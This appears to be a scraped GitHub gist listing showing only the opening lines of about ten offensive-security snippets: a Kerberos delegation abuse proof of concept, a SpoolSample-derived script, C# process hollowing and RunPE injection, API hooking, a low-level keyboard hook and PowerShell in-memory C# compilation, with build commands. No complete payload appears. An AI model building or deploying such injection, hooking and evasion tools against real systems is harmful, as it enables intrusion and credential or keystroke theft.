This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
| #!/usr/bin/env python | |
| # for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
| # this is a *very* rough PoC | |
| import SimpleHTTPServer | |
| import SocketServer | |
| import base64 | |
| import random | |
| import struct |
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
| /* | |
| ================================ Compile as a .Net DLL ============================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
| */ | |
| using System.Windows.Forms; | |
| namespace TestNamespace |
| # -*- coding: utf-8 -*- | |
| # tested on Python 3.4; lower Python versions have a different module organization. | |
| import http.server | |
| from http.server import HTTPServer, BaseHTTPRequestHandler | |
| import socketserver | |
| PORT = 8080 | |
| Handler = http.server.SimpleHTTPRequestHandler |
| #!/usr/bin/env python3 | |
| # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ | |
| # generate server.pem with the following command: | |
| # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| # run as follows: | |
| # python simple-https-server.py | |
| # then in your browser, visit: | |
| # https://localhost:4443 | |
| import http.server |
| /*************** | |
| * Simple Process Hollowing in C# | |
| * | |
| * #Build Your Binaries | |
| * c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
| * | |
| * @author: Michael Gorelik <smgorelik@gmail.com> | |
| * gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
| * #Most of the code taken from here: @github: github.com/ambray |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class FxHook:IDisposable { | |
| const int nBytes = 5; | |
| IntPtr addr; | |
| Protection old; | |
| byte[] src = new byte[5]; |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| public static class DynamicCallRunPE | |
| { | |
| private delegate bool CreateProcess_Delegate(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, IntPtr startupInfo, IntPtr processInformation); | |
| private delegate bool ThreadContext_Delegate(IntPtr thread, int[] context); | |
| private delegate bool ProcessMemoryIntPtr_Delegate(IntPtr process, int baseAddress, IntPtr buffer, int bufferSize, int bytesRead); | |
| private delegate bool ProcessMemoryByte_Delegate(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, int bytesRead); |
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| using System.Windows.Forms; | |
| /// <summary> | |
| /// Low Level mouse and keyboard hook wrapper | |
| /// Made by BahNahNah | |
| /// </summary> | |
| public class LowLevelHook |
| After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
| These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
| Basic gist after running PS script statements: | |
| - Loads C# project from file or web URL | |
| - Create various tmp files | |
| - Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
| - Convert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]